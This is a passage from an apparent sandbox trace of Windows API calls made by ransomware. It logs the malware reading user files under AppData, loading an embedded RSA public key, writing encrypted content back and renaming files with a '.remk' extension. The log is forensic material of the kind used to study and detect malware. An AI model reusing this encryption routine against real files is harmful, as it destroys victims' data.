lpFileSize=0x3adfb40*=185344) returned 1 [0237.206] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0237.208] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x2d3da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.209] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0237.211] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0237.211] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x25805, lpOverlapped=0x0) returned 1 [0237.213] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.213] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0237.213] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.213] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.213] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0237.214] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0237.214] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0237.214] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0237.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0237.215] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0237.215] GetLastError () returned 0x0 [0237.215] CryptDestroyHash (hHash=0x31de170) returned 1 [0237.215] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0237.215] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0237.215] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0237.215] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0237.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0237.215] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0237.215] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0237.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0237.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25810) returned 0x37cf820 [0237.216] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0237.216] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0237.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0237.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0237.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0237.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0237.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf2a0 [0237.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc990 [0237.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf2e8 [0237.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc9a8 [0237.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc9d8 [0237.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca38 [0237.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc9f0 [0237.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0237.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0237.217] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0237.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0237.217] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9d8 | out: hHeap=0x630000) returned 1 [0237.217] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9f0 | out: hHeap=0x630000) returned 1 [0237.217] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca38 | out: hHeap=0x630000) returned 1 [0237.217] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0237.218] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca38 [0237.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0237.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc9f0 [0237.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0237.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc9d8 [0237.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0237.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0237.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0237.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0237.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0237.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0237.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0237.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0237.218] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0237.218] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9f0 | out: hHeap=0x630000) returned 1 [0237.218] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0237.218] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9d8 | out: hHeap=0x630000) returned 1 [0237.218] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0237.218] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0237.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca38 | out: hHeap=0x630000) returned 1 [0237.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0237.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0237.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0237.219] GetCurrentThreadId () returned 0x314 [0237.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0237.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c69e0 [0237.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0237.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0237.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0237.220] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x2d400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.220] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0237.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0237.220] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.220] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0237.221] CloseHandle (hObject=0x640) returned 1 [0237.225] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi.remk")) returned 1 [0237.226] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.226] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0237.226] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.227] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c79a0 | out: hHeap=0x630000) returned 1 [0237.227] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7eec92c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7eec92c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eec92c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x2d400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="au.msi", cAlternateFileName="")) returned 0 [0237.227] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0237.228] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0237.228] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694fd0 | out: hHeap=0x630000) returned 1 [0237.228] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0237.228] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0237.228] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\") returned="Deployment\\" [0237.228] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0237.228] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0237.228] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0237.228] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0237.228] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0237.228] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0237.228] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0237.228] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0237.228] PathFindFileNameW (pszPath="") returned="" [0237.228] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1ea6db0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1ea6db0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0237.230] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c8 | out: hHeap=0x630000) returned 1 [0237.230] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1ea6db0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1ea6db0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0237.230] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa1ea6db0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1ea6db0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xfec5c570, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x2cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="deployment.properties", cAlternateFileName="DEPLOY~1.PRO")) returned 1 [0237.230] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties") returned=".properties" [0237.230] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0237.230] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=719) returned 1 [0237.230] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0237.233] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x2a9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.233] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0237.235] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x2cf, lpOverlapped=0x0) returned 1 [0237.235] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.235] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.235] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.235] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694fd0) returned 1 [0237.239] CryptCreateHash (in: hProv=0x694fd0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0237.239] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0237.239] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0237.240] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0237.240] GetLastError () returned 0x0 [0237.240] CryptDestroyHash (hHash=0x31de170) returned 1 [0237.240] CryptReleaseContext (hProv=0x694fd0, dwFlags=0x0) returned 1 [0237.240] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0237.240] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0237.240] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0237.240] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0237.240] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0237.240] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0237.240] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0237.240] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2d0) returned 0x31c0d08 [0237.240] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0237.240] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0237.240] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0237.240] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0237.240] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fd48 [0237.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0237.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf2e8 [0237.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc9a8 [0237.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf330 [0237.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc9c0 [0237.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc9f0 [0237.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca50 [0237.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca08 [0237.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0237.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0237.241] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0237.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0237.241] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9f0 | out: hHeap=0x630000) returned 1 [0237.241] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca08 | out: hHeap=0x630000) returned 1 [0237.241] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca50 | out: hHeap=0x630000) returned 1 [0237.241] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0237.241] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca50 [0237.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0237.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bca08 [0237.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0237.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc9f0 [0237.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0237.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31a4298 [0237.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0237.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0237.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0237.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0237.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0237.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0237.242] HeapFree (in: 